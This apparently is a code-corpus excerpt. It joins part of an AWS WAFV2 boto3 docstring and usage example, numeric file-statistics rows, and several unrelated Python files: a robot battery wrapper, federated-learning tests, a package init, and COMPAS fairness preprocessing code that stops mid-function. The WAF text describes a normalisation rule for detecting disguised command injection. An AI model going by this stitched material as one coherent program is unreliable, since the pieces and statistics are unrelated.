FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. 
The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nRateBasedStatement (dict) --A rate-based rule tracks the rate of requests for each originating IP address, and triggers the rule action when the rate exceeds a limit that you specify on the number of requests in any 5-minute time span. You can use this to put a temporary block on requests from an IP address that is sending excessive requests.\nWhen the rule action triggers, AWS WAF blocks additional requests from the IP address until the request rate falls below the limit.\nYou can optionally nest another statement inside the rate-based statement, to narrow the scope of the rule so that it only counts requests that match the nested statement. For example, based on recent requests that you have seen from an attacker, you might create a rate-based rule with a nested AND rule statement that contains the following nested statements:\n\nAn IP match statement with an IP set that specified the address 192.0.2.44.\nA string match statement that searches in the User-Agent header for the string BadBot.\n\nIn this rate-based rule, you also define a rate limit. For this example, the rate limit is 1,000. Requests that meet both of the conditions in the statements are counted. If the count exceeds 1,000 requests per five minutes, the rule action triggers. Requests that do not meet both conditions are not counted towards the rate limit and are not affected by this rule.\nYou cannot nest a RateBasedStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.\n\nLimit (integer) -- [REQUIRED]The limit on requests per 5-minute period for a single originating IP address. 
If the statement includes a ScopDownStatement , this limit is applied only to the requests that match the statement.\n\nAggregateKeyType (string) -- [REQUIRED]Setting that indicates how to aggregate the request counts. Currently, you must set this to IP . The request counts are aggregated on IP addresses.\n\nScopeDownStatement (dict) --An optional nested statement that narrows the scope of the rate-based statement to matching web requests. This can be any nestable statement, and you can nest statements at any level below this scope-down statement.\n\n\n\nAndStatement (dict) --A logical rule statement used to combine other rule statements with AND logic. You provide more than one Statement within the AndStatement .\n\nStatements (list) -- [REQUIRED]The statements to combine with AND logic. You can use any statements that can be nested.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nThe processing guidance for a Rule , used by AWS WAF to determine whether a web request matches the rule.\n\n\n\n\n\nOrStatement (dict) --A logical rule statement used to combine other rule statements with OR logic. You provide more than one Statement within the OrStatement .\n\nStatements (list) -- [REQUIRED]The statements to combine with OR logic. You can use any statements that can be nested.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nThe processing guidance for a Rule , used by AWS WAF to determine whether a web request matches the rule.\n\n\n\n\n\nNotStatement (dict) --A logical rule statement used to negate the results of another rule statement. You provide one Statement within the NotStatement .\n\nStatement (dict) --The statement to negate. You can use any statement that can be nested.\n\n\n\nManagedRuleGroupStatement (dict) --A rule statement used to run the rules that are defined in a managed rule group. To use this, provide the vendor name and the name of the rule group in this statement. You can retrieve the required names by calling ListAvailableManagedRuleGroups .\nYou can\'t nest a ManagedRuleGroupStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.\n\nVendorName (string) -- [REQUIRED]The name of the managed rule group vendor. You use this, along with the rule group name, to identify the rule group.\n\nName (string) -- [REQUIRED]The name of the managed rule group. You use this, along with the vendor name, to identify the rule group.\n\nExcludedRules (list) --The rules whose actions are set to COUNT by the web ACL, regardless of the action that is set on the rule. This effectively excludes the rule from acting on web requests.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nSpecifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . 
This effectively excludes the rule from acting on web requests.\n\nName (string) -- [REQUIRED]The name of the rule to exclude.\n\n\n\n\n\n\n\n\n\nAction (dict) --The action that AWS WAF should take on a web request when it matches the rule statement. Settings at the web ACL level can override the rule action setting.\nThis is used only for rules whose statements do not reference a rule group. Rule statements that reference a rule group include RuleGroupReferenceStatement and ManagedRuleGroupStatement .\nYou must specify either this Action setting or the rule OverrideAction setting, but not both:\n\nIf the rule statement does not reference a rule group, use this rule action setting and not the rule override action setting.\nIf the rule statement references a rule group, use the override action setting and not this action setting.\n\n\nBlock (dict) --Instructs AWS WAF to block the web request.\n\nAllow (dict) --Instructs AWS WAF to allow the web request.\n\nCount (dict) --Instructs AWS WAF to count the web request and allow it.\n\n\n\nOverrideAction (dict) --The override action to apply to the rules in a rule group. Used only for rule statements that reference a rule group, like RuleGroupReferenceStatement and ManagedRuleGroupStatement .\nSet the override action to none to leave the rule actions in effect. Set it to count to only count matches, regardless of the rule action settings.\nIn a Rule , you must specify either this OverrideAction setting or the rule Action setting, but not both:\n\nIf the rule statement references a rule group, use this override action setting and not the action setting.\nIf the rule statement does not reference a rule group, use the rule action setting and not this rule override action setting.\n\n\nCount (dict) --Override the rule action setting to count.\n\nNone (dict) --Don\'t override the rule action setting.\n\n\n\nVisibilityConfig (dict) -- [REQUIRED]Defines and enables Amazon CloudWatch metrics and web request sample collection.\n\nSampledRequestsEnabled (boolean) -- [REQUIRED]A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.\n\nCloudWatchMetricsEnabled (boolean) -- [REQUIRED]A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .\n\nMetricName (string) -- [REQUIRED]A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can\'t contain whitespace or metric names reserved for AWS WAF, for example 'All' and 'Default_Action.' You can\'t change a MetricName after you create a VisibilityConfig .\n\n\n\n\n\n\n
:type VisibilityConfig: dict
:param VisibilityConfig: [REQUIRED]\nDefines and enables Amazon CloudWatch metrics and web request sample collection.\n\nSampledRequestsEnabled (boolean) -- [REQUIRED]A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.\n\nCloudWatchMetricsEnabled (boolean) -- [REQUIRED]A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .\n\nMetricName (string) -- [REQUIRED]A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can\'t contain whitespace or metric names reserved for AWS WAF, for example 'All' and 'Default_Action.' You can\'t change a MetricName after you create a VisibilityConfig .\n\n\n
:type LockToken: string
:param LockToken: [REQUIRED]\nA token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.\n
:rtype: dict
Returns

Response Syntax
{
'NextLockToken': 'string'
}
Response Structure
(dict) --
NextLockToken (string) --
A token used for optimistic locking. AWS WAF returns this token to your update requests. You use NextLockToken in the same manner as you use LockToken.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFDuplicateItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFInvalidResourceException
WAFV2.Client.exceptions.WAFUnavailableEntityException
WAFV2.Client.exceptions.WAFSubscriptionNotFoundException
WAFV2.Client.exceptions.WAFInvalidOperationException
"""
pass
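# --- Illustrative usage sketch (not part of the generated stub above) ---
# Assumption: the stub documents the WAFV2 update_web_acl operation; the ACL
# name, Id, and scope below are made up. The pattern that matters is the
# optimistic-locking flow described in the docstring: fetch the current
# LockToken, send it back with the update, and keep the returned NextLockToken
# for the next change.
import boto3

wafv2 = boto3.client("wafv2", region_name="us-east-1")

current = wafv2.get_web_acl(Name="example-acl", Scope="REGIONAL", Id="example-id")

response = wafv2.update_web_acl(
    Name="example-acl",
    Scope="REGIONAL",
    Id="example-id",
    DefaultAction={"Allow": {}},
    Rules=[{
        "Name": "block-bad-bot",
        "Priority": 0,
        "Statement": {
            "ByteMatchStatement": {
                # The SDK base64-encodes SearchString for you (see the docstring).
                "SearchString": b"BadBot",
                "FieldToMatch": {"SingleHeader": {"Name": "user-agent"}},
                "TextTransformations": [{"Priority": 0, "Type": "NONE"}],
                "PositionalConstraint": "CONTAINS",
            }
        },
        "Action": {"Block": {}},
        "VisibilityConfig": {
            "SampledRequestsEnabled": True,
            "CloudWatchMetricsEnabled": True,
            "MetricName": "blockBadBot",
        },
    }],
    VisibilityConfig={
        "SampledRequestsEnabled": True,
        "CloudWatchMetricsEnabled": True,
        "MetricName": "exampleAcl",
    },
    LockToken=current["LockToken"],
)
print(response["NextLockToken"])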
| 69.15393
| 41,777
| 0.679977
| 85,502
| 631,652
| 5.011134
| 0.016222
| 0.015572
| 0.002661
| 0.007478
| 0.976103
| 0.973384
| 0.97179
| 0.969435
| 0.967689
| 0.964681
| 0
| 0.008494
| 0.244755
| 631,652
| 9,133
| 41,778
| 69.161502
| 0.889651
| 0.986491
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0.5
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 10
|
5a28343ec98f2153ec88919700447a453163efef
| 184
|
py
|
Python
|
scripts/pepper_interface/body/battery.py
|
MPI-IS/reactive_pepper
|
079f9b0627bfd6c9e3f2a4466c95ad662002a600
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/pepper_interface/body/battery.py
|
MPI-IS/reactive_pepper
|
079f9b0627bfd6c9e3f2a4466c95ad662002a600
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/pepper_interface/body/battery.py
|
MPI-IS/reactive_pepper
|
079f9b0627bfd6c9e3f2a4466c95ad662002a600
|
[
"BSD-3-Clause"
] | null | null | null |
class Battery:
    """Thin wrapper around a battery proxy that exposes getBatteryCharge()."""

    def __init__(self, battery_proxy):
        self._battery_proxy = battery_proxy

    def get(self):
        # Remaining battery charge, as reported by the proxy.
        return self._battery_proxy.getBatteryCharge()
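# Minimal usage sketch (not part of the original file). Assumption: battery_proxy
# is a NAOqi ALBattery proxy; the robot address below is illustrative.
if __name__ == "__main__":
    from naoqi import ALProxy
    proxy = ALProxy("ALBattery", "pepper.local", 9559)
    battery = Battery(proxy)
    # ALBattery.getBatteryCharge() reports the remaining charge as a percentage.
    print(battery.get())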
| 23
| 53
| 0.657609
| 20
| 184
| 5.55
| 0.45
| 0.432432
| 0.432432
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.266304
| 184
| 7
| 54
| 26.285714
| 0.822222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
5a34aaae151398e1cdfdfa2eeb4a19eee3e90013
| 4,797
|
py
|
Python
|
test/data_distribution/test_data_distribution_iid.py
|
joarreg/Sherpa.ai-Federated-Learning-Framework
|
9da392bf71c9acf13761dde0f119622c62780c87
|
[
"Apache-2.0"
] | 2
|
2021-11-14T12:04:39.000Z
|
2022-01-03T16:03:36.000Z
|
test/data_distribution/test_data_distribution_iid.py
|
joarreg/Sherpa.ai-Federated-Learning-Framework
|
9da392bf71c9acf13761dde0f119622c62780c87
|
[
"Apache-2.0"
] | null | null | null |
test/data_distribution/test_data_distribution_iid.py
|
joarreg/Sherpa.ai-Federated-Learning-Framework
|
9da392bf71c9acf13761dde0f119622c62780c87
|
[
"Apache-2.0"
] | 1
|
2022-01-19T16:29:46.000Z
|
2022-01-19T16:29:46.000Z
|
import numpy as np
import tensorflow as tf
from shfl.data_base.data_base import DataBase
from shfl.data_distribution.data_distribution_iid import IidDataDistribution
class TestDataBase(DataBase):
def __init__(self):
super(TestDataBase, self).__init__()
def load_data(self):
self._train_data = np.random.rand(200).reshape([40, 5])
self._test_data = np.random.rand(200).reshape([40, 5])
self._train_labels = tf.keras.utils.to_categorical(np.random.randint(0, 10, 40))
self._test_labels = tf.keras.utils.to_categorical(np.random.randint(0, 10, 40))
def test_make_data_federated():
data = TestDataBase()
data.load_data()
data_distribution = IidDataDistribution(data)
train_data, train_label = data_distribution._database.train
num_nodes = 3
percent = 60
# weights = np.full(num_nodes, 1/num_nodes)
weights = [0.5, 0.25, 0.25]
federated_data, federated_label = data_distribution.make_data_federated(train_data,
train_label,
num_nodes,
percent,
weights)
data_distribution.get_federated_data(3)
all_data = np.concatenate(federated_data)
all_label = np.concatenate(federated_label)
idx = []
for data in all_data:
idx.append(np.where((data == train_data).all(axis=1))[0][0])
for i, weight in enumerate(weights):
assert federated_data[i].shape[0] == int(weight * int(percent * train_data.shape[0] / 100))
assert all_data.shape[0] == int(percent * train_data.shape[0] / 100)
assert num_nodes == federated_data.shape[0] == federated_label.shape[0]
assert (np.sort(all_data.ravel()) == np.sort(train_data[idx,].ravel())).all()
assert (np.sort(all_label, 0) == np.sort(train_label[idx], 0)).all()
#test make federated data with replacement
federated_data, federated_label = data_distribution.make_data_federated(train_data,
train_label,
num_nodes,
percent,
weights,
sampling="with_replacement")
all_data = np.concatenate(federated_data)
all_label = np.concatenate(federated_label)
idx = []
for data in all_data:
idx.append(np.where((data == train_data).all(axis=1))[0][0])
for i, weight in enumerate(weights):
assert federated_data[i].shape[0] == int(weight * int(percent * train_data.shape[0] / 100))
assert all_data.shape[0] == int(percent * train_data.shape[0] / 100)
assert num_nodes == federated_data.shape[0] == federated_label.shape[0]
assert (np.sort(all_data.ravel()) == np.sort(train_data[idx,].ravel())).all()
assert (np.sort(all_label, 0) == np.sort(train_label[idx], 0)).all()
def test_make_data_federated_wrong_weights():
data = TestDataBase()
data.load_data()
data_distribution = IidDataDistribution(data)
train_data, train_label = data_distribution._database.train
num_nodes = 3
percent = 60
# weights = np.full(num_nodes, 1/num_nodes)
weights = [0.5, 0.5, 0.5]
federated_data, federated_label = data_distribution.make_data_federated(train_data,
train_label,
num_nodes,
percent,
weights)
weights = np.array([float(i) / sum(weights) for i in weights])
data_distribution.get_federated_data(3)
all_data = np.concatenate(federated_data)
all_label = np.concatenate(federated_label)
idx = []
for data in all_data:
idx.append(np.where((data == train_data).all(axis=1))[0][0])
for i, weight in enumerate(weights):
assert federated_data[i].shape[0] == int(weight * int(percent * train_data.shape[0] / 100))
assert all_data.shape[0] == int(percent * train_data.shape[0] / 100)
assert num_nodes == federated_data.shape[0] == federated_label.shape[0]
assert (np.sort(all_data.ravel()) == np.sort(train_data[idx,].ravel())).all()
assert (np.sort(all_label, 0) == np.sort(train_label[idx], 0)).all()
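# Worked check of the size assertions above (illustrative, not in the original tests):
# with 40 training rows, percent=60 and weights [0.5, 0.25, 0.25], the federated
# split should hand out 24 rows in total, distributed 12/6/6 across the 3 nodes.
percent, weights, n_rows = 60, [0.5, 0.25, 0.25], 40
total = int(percent * n_rows / 100)            # 24 rows sampled overall
per_node = [int(w * total) for w in weights]   # [12, 6, 6]
assert per_node == [12, 6, 6] and sum(per_node) == total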
| 44.009174
| 104
| 0.554722
| 556
| 4,797
| 4.548561
| 0.133094
| 0.064057
| 0.04745
| 0.045077
| 0.858442
| 0.839462
| 0.839462
| 0.839462
| 0.839462
| 0.813365
| 0
| 0.030494
| 0.336877
| 4,797
| 108
| 105
| 44.416667
| 0.764539
| 0.025849
| 0
| 0.7625
| 0
| 0
| 0.003427
| 0
| 0
| 0
| 0
| 0
| 0.1875
| 1
| 0.05
| false
| 0
| 0.05
| 0
| 0.1125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5a814e6e3a3903a3c1eaaf3086331127293a606f
| 118
|
py
|
Python
|
ezldap/__init__.py
|
mschaffenroth/ezldap
|
c2b3fe453d7ad60e4ff3e2245a8f4914a91542c4
|
[
"BSD-3-Clause"
] | 7
|
2018-05-10T01:31:46.000Z
|
2021-03-30T10:13:41.000Z
|
ezldap/__init__.py
|
mschaffenroth/ezldap
|
c2b3fe453d7ad60e4ff3e2245a8f4914a91542c4
|
[
"BSD-3-Clause"
] | 1
|
2019-04-24T15:59:18.000Z
|
2019-04-24T15:59:18.000Z
|
ezldap/__init__.py
|
mschaffenroth/ezldap
|
c2b3fe453d7ad60e4ff3e2245a8f4914a91542c4
|
[
"BSD-3-Clause"
] | 2
|
2020-11-15T12:18:08.000Z
|
2021-03-30T10:13:44.000Z
|
from .api import *
from .password import *
from .config import *
from .ldif import *
from .version import __version__
| 19.666667
| 32
| 0.754237
| 16
| 118
| 5.3125
| 0.4375
| 0.470588
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.169492
| 118
| 5
| 33
| 23.6
| 0.867347
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.2
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
ce681fca8c026eb969132e02436b63d973b5bce1
| 28,158
|
py
|
Python
|
models/compas_model.py
|
GU-DataLab/fairness-and-missing-values
|
36a900aa235d1d53bd57e11c89e3f73f9a585aca
|
[
"MIT"
] | null | null | null |
models/compas_model.py
|
GU-DataLab/fairness-and-missing-values
|
36a900aa235d1d53bd57e11c89e3f73f9a585aca
|
[
"MIT"
] | null | null | null |
models/compas_model.py
|
GU-DataLab/fairness-and-missing-values
|
36a900aa235d1d53bd57e11c89e3f73f9a585aca
|
[
"MIT"
] | null | null | null |
import sys
sys.path.append("../AIF360/")
import numpy as np
from tot_metrics import TPR, TNR
from aif360.metrics import BinaryLabelDatasetMetric
from aif360.algorithms.preprocessing.optim_preproc import OptimPreproc
from aif360.algorithms.preprocessing.optim_preproc_helpers.opt_tools\
import OptTools
from sklearn.linear_model import LogisticRegression
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import accuracy_score
from aif360.datasets import StandardDataset
import warnings
import pandas as pd
warnings.simplefilter("ignore")
from sklearn.utils import resample
from sklearn.model_selection import train_test_split
def get_distortion_compas(vold, vnew):
"""Distortion function for the compas dataset. We set the distortion
metric here. See section 4.3 in supplementary material of
http://papers.nips.cc/paper/6988-optimized-pre-processing-for-discrimination-prevention
for an example
Note:
Users can use this as templates to create other distortion functions.
Args:
vold (dict) : {attr:value} with old values
vnew (dict) : dictionary of the form {attr:value} with new values
Returns:
d (value) : distortion value
"""
# Distortion cost
distort = {}
distort['two_year_recid'] = pd.DataFrame(
{'No recid.': [0., 2.],
'Did recid.': [2., 0.]},
index=['No recid.', 'Did recid.'])
distort['age_cat'] = pd.DataFrame(
{'Less than 25': [0., 1., 2.],
'25 to 45': [1., 0., 1.],
'Greater than 45': [2., 1., 0.]},
index=['Less than 25', '25 to 45', 'Greater than 45'])
distort['c_charge_degree'] = pd.DataFrame(
{'M': [0., 2.],
'F': [1., 0.]},
index=['M', 'F'])
distort['priors_count'] = pd.DataFrame(
{'0': [0., 1., 2., 100.],
'1 to 3': [1., 0., 1., 100.],
'More than 3': [2., 1., 0., 100.],
'missing': [0., 0., 0., 1.]},
index=['0', '1 to 3', 'More than 3', 'missing'])
distort['score_text'] = pd.DataFrame(
{'Low': [0., 2.],
'MediumHigh': [2., 0.]},
index=['Low', 'MediumHigh'])
distort['sex'] = pd.DataFrame(
{0.0: [0., 2.],
1.0: [2., 0.]},
index=[0.0, 1.0])
distort['race'] = pd.DataFrame(
{0.0: [0., 2.],
1.0: [2., 0.]},
index=[0.0, 1.0])
total_cost = 0.0
for k in vold:
if k in vnew:
total_cost += distort[k].loc[vnew[k], vold[k]]
return total_cost
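# Illustrative check of the lookup above (not part of the original module):
# changing sex 0.0 -> 1.0 costs 2.0 and age_cat 'Less than 25' -> '25 to 45'
# costs 1.0, so the total distortion is 3.0.
_example_cost = get_distortion_compas(
    {'sex': 0.0, 'age_cat': 'Less than 25'},
    {'sex': 1.0, 'age_cat': '25 to 45'})
assert _example_cost == 3.0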
default_mappings = {
'label_maps': [{1.0: 'Did recid.', 0.0: 'No recid.'}],
'protected_attribute_maps': [{0.0: 'Male', 1.0: 'Female'},
{1.0: 'Caucasian', 0.0: 'Not Caucasian'}]
}
def default_preprocessing(df):
"""Perform the same preprocessing as the original analysis:
https://github.com/propublica/compas-analysis/blob/master/Compas%20Analysis.ipynb
"""
return df[(df.days_b_screening_arrest <= 30)
& (df.days_b_screening_arrest >= -30)
& (df.is_recid != -1)
& (df.c_charge_degree != 'O')
& (df.score_text != 'N/A')]
class CompasDataset(StandardDataset):
"""ProPublica COMPAS Dataset.
See :file:`aif360/data/raw/compas/README.md`.
"""
def __init__(
self,
label_name='two_year_recid',
favorable_classes=[0],
protected_attribute_names=[
'sex',
'race'],
privileged_classes=[
['Female'],
['Caucasian']],
instance_weights_name=None,
categorical_features=[
'age_cat',
'c_charge_degree',
'c_charge_desc'],
features_to_keep=[
'sex',
'age',
'age_cat',
'race',
'juv_fel_count',
'juv_misd_count',
'juv_other_count',
'priors_count',
'c_charge_degree',
'c_charge_desc',
'two_year_recid',
'length_of_stay'],
features_to_drop=[],
na_values=[],
custom_preprocessing=default_preprocessing,
metadata=default_mappings):
def quantizePrior1(x):
if x <= 0:
return 0
elif 1 <= x <= 3:
return 1
else:
return 2
def quantizeLOS(x):
if x <= 7:
return 0
if 8 < x <= 93:
return 1
else:
return 2
def group_race(x):
if x == "Caucasian":
return 1.0
else:
return 0.0
filepath = 'data/compas/compas-scores-two-years.csv'
df = pd.read_csv(filepath, index_col='id', na_values=[])
df['age_cat'] = df['age_cat'].replace('Greater than 45', 2)
df['age_cat'] = df['age_cat'].replace('25 - 45', 1)
df['age_cat'] = df['age_cat'].replace('Less than 25', 0)
df['score_text'] = df['score_text'].replace('High', 1)
df['score_text'] = df['score_text'].replace('Medium', 1)
df['score_text'] = df['score_text'].replace('Low', 0)
df['priors_count'] = df['priors_count'].apply(
lambda x: quantizePrior1(x))
df['length_of_stay'] = (pd.to_datetime(df['c_jail_out']) -
pd.to_datetime(df['c_jail_in'])).apply(
lambda x: x.days)
df['length_of_stay'] = df['length_of_stay'].apply(
lambda x: quantizeLOS(x))
df = df.loc[~df['race'].isin(
['Native American', 'Hispanic', 'Asian', 'Other']), :]
df['c_charge_degree'] = df['c_charge_degree'].replace({'F': 0, 'M': 1})
df['c_charge_degree'] = df['c_charge_degree'].replace({0: 'F', 1: 'M'})
super(
CompasDataset,
self).__init__(
df=df,
label_name=label_name,
favorable_classes=favorable_classes,
protected_attribute_names=protected_attribute_names,
privileged_classes=privileged_classes,
instance_weights_name=instance_weights_name,
categorical_features=categorical_features,
features_to_keep=features_to_keep,
features_to_drop=features_to_drop,
na_values=na_values,
custom_preprocessing=custom_preprocessing,
metadata=metadata)
def reweight_df(dataset_orig_train):
df_weight = dataset_orig_train.convert_to_dataframe()[0]
df_weight['weight'] = 1
df_weight['is_missing'] = 0
df_weight['tmp'] = ''
tmp_result = []
for i, j in zip(df_weight['race'], df_weight['two_year_recid']):
tmp_result.append(str(i) + str(j))
df_weight['tmp'] = tmp_result
df_weight.loc[df_weight['priors_count=missing'] == 1, 'is_missing'] = 1
for i in df_weight['tmp'].unique():
df_weight.loc[(df_weight['tmp'] == i) & (df_weight['is_missing'] == 0),
'weight'] = len(df_weight.loc[(df_weight['tmp'] == i),
:].index) / len(df_weight.loc[(df_weight['tmp'] == i) & (df_weight['is_missing'] == 0),
:].index)
df_weight.loc[(df_weight['tmp'] == i) & (df_weight['is_missing'] == 1),
'weight'] = len(df_weight.loc[(df_weight['tmp'] == i) & (df_weight['is_missing'] == 0),
:].index) / len(df_weight.loc[(df_weight['tmp'] == i),
:].index)
return np.array(df_weight['weight'])
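# Illustrative arithmetic for the weights above (not part of the original file):
# within one (race, two_year_recid) group of 10 rows where 8 have an observed
# priors_count, each observed row is weighted 10/8 = 1.25 (so the observed rows
# sum to the full group size) and each missing row is weighted 8/10 = 0.8.
_group_size, _observed = 10.0, 8.0
_w_observed, _w_missing = _group_size / _observed, _observed / _group_size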
def get_evaluation(dataset_orig_vt,y_pred,privileged_groups,unprivileged_groups,unpriv_val,priv_val,pos_label):
print('Accuracy')
print(accuracy_score(dataset_orig_vt.labels, y_pred))
dataset_orig_vt_copy1 = dataset_orig_vt.copy()
dataset_orig_vt_copy1.labels = y_pred
metric_transf_train1 = BinaryLabelDatasetMetric(
dataset_orig_vt_copy1,
unprivileged_groups=unprivileged_groups,
privileged_groups=privileged_groups)
print('p-rule')
print(min(metric_transf_train1.disparate_impact(),
1 / metric_transf_train1.disparate_impact()))
print('FPR for unpriv group')
orig_sens_att = dataset_orig_vt.protected_attributes.ravel()
print(1 - TNR(dataset_orig_vt.labels.ravel()
[orig_sens_att == unpriv_val], y_pred[orig_sens_att == unpriv_val], pos_label))
print("FNR for unpriv group")
print(1 - TPR(dataset_orig_vt.labels.ravel()
[orig_sens_att == unpriv_val], y_pred[orig_sens_att == unpriv_val], pos_label))
print('FPR for priv group')
orig_sens_att = dataset_orig_vt.protected_attributes.ravel()
print(1 - TNR(dataset_orig_vt.labels.ravel()
[orig_sens_att == priv_val], y_pred[orig_sens_att == priv_val], pos_label))
print("FNR for priv group")
print(1 - TPR(dataset_orig_vt.labels.ravel()
[orig_sens_att == priv_val], y_pred[orig_sens_att == priv_val], pos_label))
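# Illustrative p-rule arithmetic (not part of the original file): with a
# disparate impact of 0.8, the value printed above is min(0.8, 1/0.8) = 0.8,
# i.e. the unprivileged group receives favourable outcomes at 80% of the
# privileged group's rate.
_di = 0.8
_p_rule = min(_di, 1.0 / _di)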
def get_distortion_compas_sel(vold, vnew):
"""Distortion function for the compas dataset. We set the distortion
metric here. See section 4.3 in supplementary material of
http://papers.nips.cc/paper/6988-optimized-pre-processing-for-discrimination-prevention
for an example
Note:
Users can use this as templates to create other distortion functions.
Args:
vold (dict) : {attr:value} with old values
vnew (dict) : dictionary of the form {attr:value} with new values
Returns:
d (value) : distortion value
"""
# Distortion cost
distort = {}
distort['two_year_recid'] = pd.DataFrame(
{'No recid.': [0., 2.],
'Did recid.': [2., 0.]},
index=['No recid.', 'Did recid.'])
distort['age_cat'] = pd.DataFrame(
{'Less than 25': [0., 1., 2.],
'25 to 45': [1., 0., 1.],
'Greater than 45': [2., 1., 0.]},
index=['Less than 25', '25 to 45', 'Greater than 45'])
distort['c_charge_degree'] = pd.DataFrame(
{'M': [0., 2.],
'F': [1., 0.]},
index=['M', 'F'])
distort['priors_count'] = pd.DataFrame(
{'0': [0., 1., 2.],
'1 to 3': [1., 0., 1.],
'More than 3': [2., 1., 0.]},
index=['0', '1 to 3', 'More than 3'])
distort['score_text'] = pd.DataFrame(
{'Low': [0., 2.],
'MediumHigh': [2., 0.]},
index=['Low', 'MediumHigh'])
distort['sex'] = pd.DataFrame(
